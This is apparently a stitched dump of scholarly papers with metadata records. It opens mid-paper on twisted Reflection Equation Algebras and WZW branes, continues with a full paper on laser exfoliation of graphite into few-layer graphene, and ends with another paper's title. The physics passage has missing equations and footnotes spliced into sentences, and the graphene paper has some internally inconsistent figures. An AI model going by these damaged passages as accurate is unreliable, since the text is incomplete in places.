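    """Integer signatures m_1 >= ... >= m_n >= 0 with m_1 + m_n <= kappa + 2n + 1."""
    top = kappa + 2 * n + 1
    sigs = []
    for m in combinations_with_replacement(range(top + 1), n):
        m = tuple(reversed(m))          # enforce the dominance condition (3.7)
        if m[0] + m[-1] <= top:
            sigs.append(m)
    return sigs

# e.g. admissible_signatures(1, 4) lists the so_3-type integer signatures at level 4
```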
4. Geometry of twisted branes from the tREA.
In the present section, we unravel a number of features of the tREA's introduced, indicating towards an intimate relationship between the latter and twisted branes of the WZW models of type Let us start by recalling that the non-classical geometry of a maximally symmetric WZW brane has been successfully encoded in the representation theory of REA q (g) [13,15]. A crucial rôle in this approach has been played by the map REA q (g) → U q For the tRE, there is a similar embedding of tREA q (A 2n ) ∼ = U ′ q (so 2n+1 ) in U q (su 2n+1 ), with C -a constant (c-number-valued) matrix solution of tRE. In what follows, we take C := diag(c 1 , c 2 , . . . , c 2n+1 ) such that lim q→1 c i = 1, i ∈ 1, 2n + 1. This choice guarantees that in the classical limit, q → 1, (4.1) defines the embedding: in which I i+1,i denote generators of U (so 2n+1 ). The map (4.1) determines a branching of represen- 8 At the threshold, matrix elements of the generators of U ′ q (so5) develop poles. Analogous pathology occurs for U ′ q (so3) and extends to Clebsch-Gordan coefficients, as well as the associated 6j-symbols.
Analogously, the map (4.2) determines the classical counterpart of (4.3). Motivated by the analysis of the untwisted case, as well as by the considerations of [3] and [32], we propose the following identification: twisted branes correspond to those highest weight irreducible representations of $U'_q(so_{2n+1})$ which show up on the right hand side of (4.3), with the branching coefficient $\tilde b^m_\lambda$ determining the intersection of the untwisted brane described by $R_\lambda$ with the twisted one associated to $R_m$.
The rule has to be supplemented by a truncation of the $m$'s (denoted by a tilde in (4.3)), stricter than the one on the highest weight irreducible representations of $U'_q(so_{2n+1})$. The truncation is imposed on the $R_m$ as detailed below; apart from it, the branching follows the purely classical ($q = 1$) pattern. It appears that for $\kappa \in 2\mathbb{N}^*$ one can find a relatively easy algebraic prescription for the truncation 9 by demanding not only that the number of surviving irreducible representations agree with the number of admissible boundary states from the lattice of dominant fractional symmetric affine weights of $A_{2n}$ (cp [12]), but also that the ensuing distribution of $U'_q(so_{2n+1})$-representations over $P^\kappa_+(A_{2n})$ possess the $\mathbb{Z}_{2n+1}$ simple current symmetry of twisted conjugacy classes. It reads $2m_1 \le \kappa$ (4.4) and is to be iteratively imposed on the representation theory of $U'_q(so_{2n+1})$, which comes with a tensor product structure elucidated in [25].
Here is a description of the procedure leading to (4.3). As input we use the known [25] fact $b^m_{\Lambda_1} = \delta^{e_1}_m$ ($R_{\Lambda_1}$ and $R_{e_1}$ are the fundamental representations of $U_q(su_{2n+1})$ and $U'_q(so_{2n+1})$, respectively). The procedure is iterative. Let $R_\lambda = \bigoplus_m \tilde b^m_\lambda R_m$ be known (we start with $R_{\Lambda_1}$). In a single step, we tensor $R_\lambda$ with $R_{\Lambda_1}$. On the $U_q(su_{2n+1})$ side, this yields $R_\lambda \otimes R_{\Lambda_1} = \bigoplus_{\mu \in P^\kappa_+(A_{2n})} N^\mu_{\lambda \Lambda_1} R_\mu$ (the $N^\mu_{\lambda \Lambda_1}$ are multiplicities). On the $U'_q(so_{2n+1})$ side, we get $\bigoplus_m \tilde b^m_\lambda\, R_m \otimes R_{e_1}$. Luckily [25], tensor products of the kind $R_m \otimes R_{e_1}$ are well-defined 10 and can be decomposed into irreducible components. We may then derive the branching coefficients $\tilde b^m_\mu$ for the irreducible simple summands $R_\mu$ upon imposing the truncation (4.4). Clearly, we can reconstruct the entire representation theory of $U_q(su_{2n+1})$ over $P^\kappa_+(A_{2n})$ in this way, and hence we retrieve all the desired intersections. Several comments are due at this point. First of all, our usage of the quantum algebras should not obscure the fact that the truncation could just as well be imposed in the classical setup (i.e. for $so_{2n+1}$). The good news is that it can be reconciled with the specific structure of the representation theory of $U'_q(so_{2n+1})$ for $q$ a root of unity. Indeed, in consequence of (3.7), the present truncation $2m_1 \le \kappa$ implies $m_1 + m_n \le 2m_1 \le \kappa < \kappa + 2n + 1$, and hence it is more restrictive 9 The significance of the parity of $\kappa$ was emphasised already in [32]. 10 Due to the fact that $U'_q(so_{2n+1})$ is a coideal (non-Hopf) subalgebra of $U_q(su_{2n+1})$, tensoring is problematic in general.
than (3.8). Finally, the representations admitted by (4.3) correspond to those representations of the algebra so 2n+1 which can be integrated to representations of the group SO(2n + 1) [3]. The latter fact shall be of prime relevance to the discussion of the next section.
Let us also note another, rather astonishingly exact correspondence between (4.3) and BCFT.
Namely, we can calculate 11 the scalar products of a twisted boundary state $|\tilde\mu\rangle\!\rangle^{\omega_c}_C$ with all admissible untwisted boundary states $|\lambda\rangle\!\rangle_C$, whereby we obtain (4.5). Here, the $n^{\omega_c}_\lambda$ are the so-called twisted fusion rules of the CFT [31] and $E(x)$ denotes the integral part of $x$. It appears that for even $\kappa$ the branching coefficients of (4.3) coincide with these overlaps, with the identification between the truncated representation theory of $\mathrm{tREA}_q(A_{2n})$ and the set of twisted boundary labels given by the mapping originally proposed in [30] and further discussed in [3]. Thus (4.7) completes our translation of the BCFT data into the quantum-algebraic language of the tREA. Note that it actually associates (through (4.3) and (4.5)) the trivial representation, $R_0$, with the dimensionally reduced twisted brane (the one wrapping the twisted conjugacy class of the group unit) as the unique one having a non-vanishing overlap with (i.e. containing) the pointlike untwisted branes localised at the $2n+1$ points in $SU(2n+1)$ corresponding to the elements of the centre $Z(SU(2n+1)) \cong \mathbb{Z}_{2n+1}$. We shall come back to this point in the next section.
Brane localisation from Casimir eigenvalues.
We are not aware of any natural embedding $\mathrm{tREA}_q(A_{2n}) \hookrightarrow \mathrm{REA}_q(A_{2n})$. Recall that, following [13], we assign to the latter algebra the rôle of the quantised algebra of functions on the group manifold. Thus, the lack of such a map prevents us from giving a direct geometrical meaning to various quantities associated with the tREA's, e.g. to their Casimir operators. Luckily, the situation is not hopeless. We may employ (4.1) and the map $\mathrm{REA}_q(A_{2n}) \to U_q(su_{2n+1})$, (A.8), to construct a map $\mathrm{tREA}_q(A_{2n}) \to \mathrm{REA}_q(A_{2n})$ order by order in the parameter $1/\kappa$, in a manner consistent with the $q \to 1$ limiting procedure described in [13]. Using this expansion we shall express the quadratic Casimir operator $c_1$ of $\mathrm{tREA}_q(A_{2n})$ in terms of the $M$-variables, that is, in terms of solutions to the (untwisted) RE (cp [13,15]). All approximate equalities below hold up to terms of higher order in the expansion parameter. We also choose $C := \mathbf{1}$. 11 Details of the relevant BCFT computation leading to (4.5) shall be presented in an upcoming paper.
First, note that $K^\pm_{ii} \approx \mathbf{1}$ for all $i \in \overline{1, 2n+1}$. Hence $c_1 \approx \sum_i \mathbf{1} + \sum_{i>j} K^-_{ij} K^+_{ji}$. Upon subtracting the trivial part, we then define the reduced Casimir $\tilde c_1$. We also have $K^-_{ij} \approx \sum_{j \le k \le i} L^+_{ki} L^-_{kj}$ and $K^+_{ji} \approx \sum_{j \le k \le i} SL^+_{ik}\, SL^-_{jk}$. Using the results from App. D of [15], the relevant (leading) terms of the $L^\pm$-operators can be listed, with the $E_{ij}$ defined as in [15] (their explicit form is not relevant here). Since $M_{ij} \approx \lambda E_{ji}$ for $i \ne j$, we conclude that $\tilde c_1$ takes the form (4.12).
Equivalently, from the (co)isometry (3.5) of irreducible representations of U ′ q (so 2n+1 ) we conclude that the geometry defined by R 0 is encoded in the twisted SU q (2n+1)-comodule algebra: C → s T Cs and therefore it describes the twisted (quantum) conjugacy class of the group unit. 12 Note that (3.8) does not guarantee the uniqueness.
It turns out that we may extract further information from the semiclassical result (4.12)-(4.13), whereby we gain some insight into its physical meaning. To these ends we specialise the formulae to the simplest physically relevant 13 case: n = 1. Plugging into (4.12) the explicit classical parametrisation (2.7) of twisted conjugacy classes of G = SU (3), and comparing with (4.13) we get the relation: where -as previously -λ 1 = 2m 1 ∈ N [20]. We can regard (4.15) as a quantisation condition for brane positions.
Clearly, the above rule retains its validity for $\lambda_1 = 0$; hence we may expect it to be generally applicable in the large-$\kappa$ limit.
The significance of the classical limit (4.16) of our quantum-algebraic result follows from the fact that it is amenable to direct comparison with the data on twisted brane localisation found in the literature 14 . Thus we compare (4.16) with the relative-cohomological analysis of [32], using the same group-integrated representative of $\omega_c$ as the one quantised by the tRE's (3.1)-(3.2). The analysis yields a quantisation rule, (4.17), which falls in perfect agreement with (4.16) (for even $\kappa$) and, consequently, lends support to our proposal. Indeed, upon restricting in (4.13) to integer-spin irreducible representations of $U'_q(so_3)$, the two quantisation formulae become fully equivalent. The latter representations, on the other hand, are precisely the ones that appear in (truncated) branchings of the irreducible representations of $\mathrm{REA}_q(A_2)$ used in [15] in the description of untwisted branes, as determined by (4.3).
Summary and conclusions.
In the present paper, we have discussed a class of quantum algebras, the twisted Reflection Equation Algebras tREA q (A 2n ), in reference to twisted boundary states of WZW models for the 13 The classical SU (2) has no non-trivial diagram automorphisms. 14 As for exact BCFT data of, e.g., [9] it unavoidably becomes obscured by the conventions adopted in the original papers. They differ from ours in the choice of the representative of the class of automorphisms implementing the Dynkin diagram reflection on the group level.
groups SU (2n + 1) and the associated brane worldvolumes wrapping (classically) twisted conjugacy classes within the group manifolds. The framework, developed as a straightforward extension of the previous constructions for untwisted WZW branes, based on the untwisted Reflection Equation Algebras REA q (A 2n ), is a novel proposal for a compact algebraic description of the twisted branes.
Our study provides several arguments in favour of its profound relationship to the BCFT of twisted branes; in particular, the truncation is identical with the one suggested in [30] in the BCFT context.
In conclusion, we believe that there are sound reasons to regard the tREA's as natural building blocks of quantum-algebraic matrix models for twisted branes on the SU (2n + 1) WZW manifolds.
While encouraged by the results obtained hitherto, we are aware of numerous questions that our study leaves unanswered, such as the harmonic analysis on the associated geometries, and the gauge dynamics of twisted WZW branes that the algebras are claimed to describe. We intend to return to them in a future publication.
In this appendix, we discuss chosen properties of the three RE's appearing in the paper, eqs. (A.1)-(A.3). In the formulae, $R$ is a bi-fundamental realisation of the standard universal R-matrix of the relevant quantum group $U_q(su_{2n+1})$, $R \equiv (R_V \otimes R_V)(\mathcal{R})$, satisfying the celebrated Quantum Yang-Baxter Equation (see, e.g., [14]). The operator-valued matrix $K_\mp$ (resp. $M$) generates the twisted (resp. untwisted) Reflection Equation Algebra $\mathrm{tREA}_q(A_{2n})_\mp$ (resp. $\mathrm{REA}_q(A_{2n})$), whose quantum group comodule structure and relation to the twisted (resp. untwisted) quantum algebra $U'_q(so_{2n+1})$ (resp. $U_q(su_{2n+1})$) shall be discussed in the sequel.
A.1 Symmetries of the RE's and their relation to U_q(su_2n+1).
The three RE's of interest enjoy the following (twisted) left-right (co)symmetries, which are crucial for their applicability in an effective description of branes in WZW models (S is the antipode of the Hopf algebra SU_q(2n+1)), where

    R_12 s_1 s_2 = s_2 s_1 R_12,   R_12 t_1 t_2 = t_2 t_1 R_12,   R_12 t_1 s_2 = s_2 t_1 R_12   (A.6)

are the defining relations of (two copies of) the quantum group SU_q(2n+1) associated to the R-matrix R.
Solutions to the three RE's under study can straightforwardly be realised in terms of generators of the (extended) quantum universal enveloping algebra U_q(su_2n+1) through (A.7), where L^± are the familiar FRT operators [18]. The existence of the homomorphisms thus defined enables us to use the well-known representation theory of the quantum algebra U_q(su_2n+1) to induce a representation theory of the (t)REA's. In particular, the relevant (specialised) representation theory of U_q(su_2n+1) has been studied at some length in [15].
The twisted quantum orthogonal algebra U'_q(so_2n+1), considered originally by Gavrilik and Klimyk in [19], is defined by commutation relations satisfied by its generators Π_i, i ∈ {1, ..., 2n+1}. In the classical limit, q → 1, these relations reproduce the standard defining relations of U(so_2n+1). They differ, on the other hand, from the defining relations of the quantum universal enveloping algebra U_q(so_2n+1) (of Drinfel'd and Jimbo) associated to the universal R-matrix for so_2n+1 (e.g. [14]).
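For orientation, in the simplest case n = 1 the algebra U'_q(so_3) is generated by two elements, and its cubic presentation can be written out explicitly. The following is our transcription of the standard form found in the Gavrilik-Klimyk literature (the normalisation of the right-hand sides may differ from the conventions of [19]):

    \begin{aligned}
    \Pi_1^2\Pi_2 - (q+q^{-1})\,\Pi_1\Pi_2\Pi_1 + \Pi_2\Pi_1^2 &= -\Pi_2\,,\\
    \Pi_2^2\Pi_1 - (q+q^{-1})\,\Pi_2\Pi_1\Pi_2 + \Pi_1\Pi_2^2 &= -\Pi_1\,.
    \end{aligned}

At q → 1 these reduce to [Π_1,[Π_1,Π_2]] = -Π_2 and [Π_2,[Π_2,Π_1]] = -Π_1, i.e. to the defining relations of U(so_3).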
In addition to the above generators, we define, after [28], the operators Π^∓_ji, 1 ≤ i < j ≤ 2n+1. It is then a matter of straightforward algebra to verify that the elements of the two operator-valued solutions to (A.1)-(A.2) provide a realisation of the algebra of the Π^∓_ji's. More precisely, we have an identification establishing a homomorphism U'_q(so_2n+1) → tREA_q(A_2n)^∓. This, together with the explicit mappings tREA_q(A_2n)^∓ → U_q(su_2n+1) of (A.7), embeds U'_q(so_2n+1) in U_q(su_2n+1) as a so-called coideal subalgebra [29]. Its representation theory, both of classical and non-classical type, has been discussed in great detail in a series of papers [19,20,23,25], also in relation to the representation theory of U_q(su_2n+1). An important conclusion following from that analysis is that we can effectively restrict to U'_q(so_2n+1)-irreducible representations of the classical type as long as we are dealing with classical-type irreducible representations of U_q(su_2n+1) (which branch into the former). | 2014-10-01T00:00:00.000Z | 2004-01-01T00:00:00.000 | {
"year": 2004,
"sha1": "b3dd52313f86f5dcd642deaa56e708d54d2a5b97",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/hep-th/0412146",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "2b730a02c88a2efacb9546c0efd77b41259ae7a0",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": []
} |
22260821 | pes2o/s2orc | v3-fos-license | Laser-Plasma Driven Synthesis of Carbon-Based Nanomaterials
In this paper we introduce a laser-plasma driven method for the production of carbon based nanomaterials and in particular bi- and few-layers of Graphene. This is obtained by using laser-plasma exfoliation of amorphous Graphite in a liquid solution, employing a laser with an energy density in the order of 0.5 J/mm2. Raman and XPS analyses of the carbon colloid performed at different irradiation stages indicate the formation of Graphene multilayers with an increasing number of layers: the number of layers varies from a monolayer obtained in the first few seconds of the laser irradiation, to two layers obtained after 10 s, and finally to Graphite and amorphous carbon obtained after 40 s of irradiation. The obtained colloids are pure, without any impurities or Graphene oxides, and can easily be deposited onto large surfaces (in the order of cm2) for characterization or for use in diverse applications.
M. Barberio & P. Antici
Graphene is one of the most promising materials for nanoscience applications [1][2][3]. This simple 2-D material, composed of a single layer of carbon atoms, is characterized by high electron mobility and a field-generated band gap, and is therefore classified as a zero-gap semiconductor 4. Nevertheless, technological applications that take advantage of Graphene electronic transport properties require structurally coherent Graphene on a large scale (e.g. wafer scale), or large arrays of Graphene flakes positioned with a unique azimuthal orientation on a substrate.
In recent decades, many preparation processes have been suggested in order to improve the quality of Graphene and its properties. The first method was the mechanical exfoliation from Graphite proposed in 2004 4, which, being a low-budget technique, strongly contributed to arousing interest in Graphene. However, the produced Graphene flakes have irregular shapes and a random azimuthal orientation. Currently, Chemical Vapor Deposition (CVD) on transition metal substrates [5][6][7] produces the best quality Graphene. In particular, CVD Graphene deposited on copper foils forms large uniform layers. Nonetheless, the electrical properties of CVD Graphene cannot be tested on a metal substrate, since the testing requires a transfer process of the Graphene layer onto an appropriate insulating substrate. The transfer process often affects the Graphene integrity, its properties, and thus the overall performance: wrinkle formation, impurities, Graphene tearing, and other structural defects can occur during the transfer. Moreover, CVD Graphene grown on substrates has its size limited by the reactor size, which restricts large-scale production. Alternative methods for the production of Graphene are epitaxial growth on metal surfaces or graphitization of hexagonal SiC 8,9. In all these cases, the quality of Graphene is strictly related to the substrate properties, such as size, crystallinity, and purity, and, similarly to CVD, these production processes require a transfer.
In addition to these processes, laser-driven methods for the synthesis of nanomaterials have recently been proposed as alternatives to chemical techniques 10. The most widely employed laser method is Laser Ablation, which can be performed in vacuum, in a controlled gaseous atmosphere, or in liquid (Laser Ablation Synthesis in Solution, LASiS). Laser methods allow precise control over the dimensions and shapes of the produced nanomaterials, with in-situ tuning of the material properties possible by simply changing the laser and plasma characteristics. While these methods are efficiently used for the synthesis of nanoparticles and quantum dots 11,12, the high temperatures and pressures reached in the generated plasma prevent their use in Graphene synthesis: such high temperatures can induce the amorphization of the carbon structures, leading to a complete loss of the hexagonal lattice.
In the following, we propose a simple method for the large-scale production of a colloidal solution of Graphene flakes, based on the interaction between a high-power laser beam (power of about 100 MW) and a material bulk. The technique (see Fig. 1) is based on the exfoliation of an amorphous Graphite sample placed in a liquid solution by means of high-power laser irradiation. The laser-carbon interaction in a liquid solution thermalizes the system, preventing it from reaching the melting temperature. The exfoliated carbon layer remains suspended in the solution.
Materials and Methods
The Laser Exfoliation Method. Our Graphene growth method is based on the laser exfoliation (LE) of amorphous Graphite, realized with an experimental arrangement typically employed in the conventional laser method for nanomaterial synthesis, the "Laser Ablation Synthesis in Solution" (LASiS). The preparation of Graphene flakes using LE has the advantage of not requiring vacuum conditions (unlike CVD or epitaxial growth), and as such allows layers of higher purity to be produced in diverse solutions (permitting the choice of the solution most suitable for the application). In our experimental setup, a Graphite plate, with a nominal purity of 99.99% and dimensions of about 1 cm × 1 cm, is placed on the bottom of a vessel cuvette containing an aqueous solution of acetone (90%). We chose acetone as the solvent (an oxygen-free environment) to prevent the oxidation of the nanoflakes during the synthesis process and the formation of Graphene oxide. The plate is ablated with the second harmonic (532 nm) of a pulsed Nd:YAG laser. The laser spot size on the target surface is about 1 mm2. The laser energy is about 0.5 J/pulse (with a pulse length of 7 ns), corresponding to a fluence of about 0.5 J/mm2. The laser beam used for the LE reaches the target through the top surface of the cuvette. The colloidal solution, produced at different irradiation times, is transferred to a copper surface by drop-casting and heated in air up to 70 °C for solvent evaporation. Analytical characterization of each deposited drop was performed to obtain morphological (AFM, SEM) and chemical (Raman, XPS) information. Unlike the classical Laser Ablation technique employed for the synthesis of nanoparticles, where the approach is typically bottom-up (i.e. atoms nucleate, producing nanoparticles), the physical phenomena involved in LE can be attributed to both a top-down and a bottom-up approach: when the laser irradiates the carbon surface, it generates (similarly to the generation of nanoparticles) different phenomena, such as the detachment of single carbon atoms, which aggregate into amorphous carbon particles (bottom-up), and the exfoliation of single or multiple layers of Graphene (top-down). All the detached material is distributed in the plasma plume and dispersed in the colloidal solution. While the Graphene multilayers stay suspended in the colloidal solution, the carbon atoms aggregate, producing amorphous microparticles.
Morphological analysis of the colloidal drops deposited onto a silicon surface indicates the presence of Graphene bi- and multi-layers and of amorphous carbon aggregates generated by the aggregation of single atoms detached during the laser irradiation. Nevertheless, the relative amounts of Graphene multilayers and amorphous aggregates change with irradiation time, indicating that the two phenomena (particle synthesis and Graphene exfoliation) occur at different stages. The presence of amorphous carbon in the solution is higher after the first 10 s of irradiation, clearly indicating that the breaking of the interlayer bonding is the predominant phenomenon in the first phase of the laser irradiation, while it becomes negligible with respect to the amorphous aggregation in the second phase. The colloidal solution is finally deposited by drop casting on a conductive glass substrate, and the film is heated in air to about 50 °C to facilitate the solvent evaporation. The deposited layer is analysed in order to check the possibility of covering very large substrates with the produced Graphene multilayers and to test their electrical and optical properties. XPS measurements are conducted in a UHV chamber equipped for standard surface analysis, with a pressure in the range of 10^-9 torr. Non-monochromatic Mg-Kα X-rays (hν = 1253.64 eV) are used as the excitation source. The XPS spectra are calibrated with the C1s peak of a pure carbon sample (energy position located at 284.6 eV). All XPS spectra are corrected for analyzer transmission, and the background is subtracted using the straight-line subtraction mode. Moreover, the XPS data are fitted assuming a Gaussian distribution. Finally, the KLL Auger structure of carbon is analyzed in derivative mode to evaluate the D parameter. The Raman measurements are taken with a Raman microscope (Thermo Fisher DXR), equipped with a 532 nm laser and a spot size with a resolution of 1 micron. The spectra are obtained with a 50× objective (focal length of 15 mm). The spectral resolution, using the 1800 grooves/mm grating, was estimated to be better than about 2 cm^-1. Each micro-Raman spectrum was collected in 20 s with three accumulations.
The optical transmittance of the Graphene multilayers is measured by depositing different colloidal quantities onto a conductive glass substrate and irradiating the film with a halogen lamp under confocal microscope conditions (Olympus 900 by Horiba). The transmitted spectra are taken using a Triax 320 (Horiba-Jobin-Yvon) spectrometer working in the 300-800 nm range. The electrical measurements are conducted on the films with the best coverage uniformity (deposited onto a conductive glass). The ohmic film resistance (R) is measured using a Keithley DC current generator Model 2100 with a four-point probe, while the conductivity (σ) is calculated as σ = L/(R · A), where L is the film thickness measured from the SEM images and A the area covered by the four probe detectors (about 1 cm2).
Results and Discussion
Chemical information on the produced carbon nanostructures is obtained by studying the evolution of the G and 2D Raman structures of carbon with increasing irradiation time, while the final confirmation of Graphene formation in the best colloidal solution is obtained by analyzing the D parameter of the KLL Auger line of carbon in the XPS data. Both measurements (the G and 2D Raman bands and the D parameter) are indicated in the literature as fingerprints of the carbon allotropes.
The effectiveness of Raman diagnostics for identifying the presence of Graphene on a surface is well known in the literature and is generally used as proof of Graphene formation and deposition 18. The systematic study by Graf et al. (ref. 18) indicates as the most relevant parameters for the identification of Graphene (single or multilayer) the peak position of the 2D band and the ratio between the G and 2D band intensities. In detail, a Graphene monolayer shows a 2D peak position of 2678.8 cm^-1 and a G/2D ratio around 0.25; for multilayers of Graphene (from 2 up to 5 layers) the 2D peak becomes larger, splits into different substructures, and its energy position shifts by about 19 cm^-1 for 2 layers up to about 26 cm^-1 for 6 layers. The G/2D ratio varies from 0.4 (2 layers) up to 0.8 (6 layers).
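These literature criteria lend themselves to a simple rule-of-thumb layer classification. The following Python sketch is our own illustration; the numerical cut-offs are indicative values taken from the figures quoted above, not part of ref. 18 itself:

    # Rough layer-count assignment from two Raman observables, following the
    # indicative values of Graf et al. (ref. 18). Thresholds are approximate.
    def classify_carbon(g_over_2d, pos_2d_cm1):
        """Classify a carbon deposit from the G/2D intensity ratio and the
        2D peak position (cm^-1)."""
        if g_over_2d <= 0.3 and pos_2d_cm1 <= 2680:
            return "monolayer Graphene"
        if g_over_2d <= 0.8:
            return "few-layer Graphene (2-6 layers)"
        if g_over_2d <= 1.0:
            return "multilayer Graphene / thin Graphite"
        return "Graphite or amorphous carbon"

    print(classify_carbon(0.4, 2671))  # -> few-layer Graphene (2-6 layers)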
In addition, the confirmation of Graphene formation can also be obtained by studying the changes in the carbon Auger emission. More precisely, Kaciulis et al., in ref. 19, indicate the D parameter, defined as the distance between the positive maximum and the negative minimum of the first derivative of the KLL line, as the key parameter for the identification of carbon allotropes. Their data indicate a D value of about 15 eV for Graphene, 21 eV for Graphite, and 13 eV for Diamond.
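Since the D parameter is simply the energy separation between the two extrema of the first derivative of the C KLL line, it can be evaluated directly from a measured Auger spectrum. A minimal Python sketch (assuming the spectrum is available as energy and intensity arrays; the names are ours):

    import numpy as np

    def d_parameter(energy_eV, intensity):
        """D parameter: distance in eV between the positive maximum and the
        negative minimum of the first derivative of the C KLL Auger line."""
        deriv = np.gradient(intensity, energy_eV)   # dI/dE
        e_at_max = energy_eV[np.argmax(deriv)]      # positive maximum
        e_at_min = energy_eV[np.argmin(deriv)]      # negative minimum
        return abs(e_at_min - e_at_max)

    # Interpretation (ref. 19): ~15 eV Graphene, ~21 eV Graphite, ~13 eV Diamond.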
In our experiments, we deposited 100 μL of the colloidal solution obtained at different laser irradiation times (10 s, 20 s, 30 s, 40 s, 1 minute) onto a SiO2 surface, and for each deposited droplet we took a Raman spectrum, following the evolution of the G and 2D bands. As visible from the Raman spectra in Fig. 2A, the G/2D ratio increases with irradiation time, reaching Graphite values (>1) 18 after 30/40 seconds of laser irradiation. A detailed analysis of the Raman spectrum of a colloid deposited after 10 s of irradiation (Fig. 3A) gives G and 2D energy positions of 1584 cm^-1 and 2671 cm^-1, respectively, which are typical values for 2-layer Graphene. Moreover, the D peak (see the zoom of the Raman spectra displayed in Fig. 3C), related to the defect structures in Graphite (1367 cm^-1) 15,18, is strongly reduced after 10 s of irradiation, indicating the formation of states with fewer lattice imperfections and confirming the formation of Graphene bi-layers. This conclusion is reinforced by the fact that the 2D peak (Fig. 3B) is split into 2 structures, at 2561 and 2671 cm^-1, as indicated by Graf et al. (ref. 18) for a bi-layer material. The analysis of the D parameter (Fig. 4) confirms the Raman results, indicating the typical value for Graphene (i.e. a value of 15 eV) 19 after 10 s of irradiation (see Fig. 4A). The D value increases with irradiation time and reaches 18-19 eV (the Graphite value) at 30 s of irradiation (Fig. 4B). Finally, the C1s peak (taken during the XPS measurements, see Fig. 4C) shows a single band located at an energy of 284.3 eV (characteristic of C-C chemical bonds), without the split at 287 eV characteristic of C-O bonds 15,19. This indicates the absence of oxygen impurities or Graphene oxide in the colloid.
Progressive aggregation of nanomaterials in the LASiS plume during laser irradiation is a well-known phenomenon 10. The observed starting time for the aggregation (30 s) is identical to that observed for metal and semiconducting nanoparticles [20][21][22], indicating a plume expansion and evolution similar to those observed in nanoparticle synthesis 11,12. The main stages in the LASiS exfoliation process can be summarized as follows: the process starts with the absorption of the laser pulse energy by the Graphite target. This generates both the detachment of carbon atoms from the surface and the breaking of the Van der Waals bonding between the carbon layers in the first micron of the Graphite surface. A plasma plume containing carbon atoms and the exfoliated mono- and bi-layers of carbon expands into the surrounding liquid. During the expansion, the plasma plume cools down and releases energy to the liquid solution. This phenomenon generates a cavitation bubble at the target surface, which expands in the liquid and then collapses on a time scale in the order of hundreds of microseconds. The exfoliation of mono- and multilayers and the desorption of carbon atoms are estimated to occur in a timeframe ranging from 10^-6 to 10^-4 s after the impact of the laser pulse on the surface (the laser has a pulse duration of about 7 ns). These first phases are followed by multilayer aggregation and microparticle nucleation, which both form amorphous carbon structures and Graphite.
The final confirmation of Graphene bi-layer formation is obtained by morphological analysis of a small droplet (5 µL) of colloid deposited onto copper after 10 s of irradiation. The 2D and 3D AFM images and SEM pictures in Fig. 5 clearly indicate the presence of micrometric flakes, with dimensions ranging from hundreds of nanometers up to a few microns and a thickness of 3-4 nanometers, on the copper substrate. This indicates the formation of a Graphene bi-layer (the thickness of Graphene is reported to be in the range of 0.4 to 1.7 nm 23). The analysis of colloids deposited on a glass substrate (Fig. 6) indicated that with the simple drop-cast method it is possible to cover very large areas by simply changing the amount of the deposited solution. Figure 6A shows a sequence of substrate coverages (surface area of about 200 µm2) obtained with different solution amounts. The area was completely covered with 200 µL of the colloidal solution. AFM images (Fig. 6B) indicate that the area is fully covered by a uniform film consisting of the Graphene multilayers. The glass optical transmittance (Fig. 6C) was reduced by about 4% at total coverage, indicating that the film is composed only of the Graphene multilayers, without Graphite aggregates (in that case we would expect a variation in the transmittance of the order of 50% or higher, due to the high absorbance of amorphous Graphite (of the order of 90%)). Statistical analysis (see Fig. 7A), conducted on about 500 flakes of Graphene bi-layer deposited on the glass substrate and pictured in AFM images, indicates that the flake dimensions follow a log-normal distribution with an average value of 1.37 μm and a standard deviation of about 6%.
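The quoted size statistics can be reproduced with standard tools. As an illustration only, the following Python sketch fits a log-normal distribution to a hypothetical array of flake diameters (here synthesized with the reported parameters, since the raw AFM data are not given):

    import numpy as np
    from scipy import stats

    rng = np.random.default_rng(0)
    # Hypothetical stand-in for ~500 measured flake diameters (microns)
    sizes_um = rng.lognormal(mean=np.log(1.37), sigma=0.06, size=500)

    shape, loc, scale = stats.lognorm.fit(sizes_um, floc=0)  # loc fixed at 0
    print(f"median diameter ~ {scale:.2f} um, log-sigma ~ {shape:.3f}")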
Finally, the electrical measurements conducted on the Graphene film deposited onto a conductive substrate indicate an electrical resistance of 2.08 × 10^-5 Ohm (average value over 50 measurements, see histogram in Fig. 7B), measured on a film with a thickness of 1 µm (see AFM image in the inset of Fig. 7B) and an area of 1 cm2. The calculated electrical conductivity is then about 480 S/m at atmospheric pressure, in agreement with data reported in the literature 24.
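The quoted conductivity follows directly from the formula given in the Methods section; the short Python check below (variable names ours) reproduces the reported value:

    # Conductivity of the deposited film from the four-point measurement,
    # sigma = L / (R * A), with the values quoted in the text.
    R = 2.08e-5           # ohmic film resistance [Ohm]
    L = 1e-6              # film thickness [m] (1 micron, from AFM)
    A = 1e-4              # probed area [m^2] (about 1 cm^2)
    sigma = L / (R * A)   # [S/m]
    print(f"sigma = {sigma:.0f} S/m")  # ~481 S/m, close to the reported 480 S/m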
Conclusions
In this paper, we introduce a method to synthesize bi-layers of Graphene using laser exfoliation, based on the Laser Ablation techniques typically employed in nanoparticle production. The obtained results indicate that the quality and the allotropes of the obtained carbon colloids are strictly dependent on the laser irradiation time. Graphene bi-layers are obtained in the first 10 s of irradiation, while for irradiation times greater than 30 seconds the colloids are mainly composed of amorphous carbon and Graphite. The obtained bi-layers are characterized by Raman and XPS measurements, which indicate the formation of pure carbon layers with no oxygen impurities or Graphene oxide. Moreover, the obtained micrometric flakes can be distributed over large areas (of the order of cm2), producing uniform films with high optical transmission, which indicates that the flakes do not aggregate during deposition. Finally, electrical measurements on the deposited films indicate, at atmospheric pressure, a conductivity of the order of 480 S/m, typical for Graphene films. | 2018-04-03T00:15:45.346Z | 2017-09-20T00:00:00.000 | {
"year": 2017,
"sha1": "00a7796fe790a5991190aaebb6bbcbc00ef0f501",
"oa_license": "CCBY",
"oa_url": "https://www.nature.com/articles/s41598-017-12243-4.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "8ffd63ef7edda595e61791e2501e1851e1484cbf",
"s2fieldsofstudy": [
"Materials Science",
"Physics"
],
"extfieldsofstudy": [
"Materials Science",
"Medicine"
]
} |
8394134 | pes2o/s2orc | v3-fos-license | A New Kind of Non-acoustic Speech Acquisition Method Based on Millimeter Wave Radar
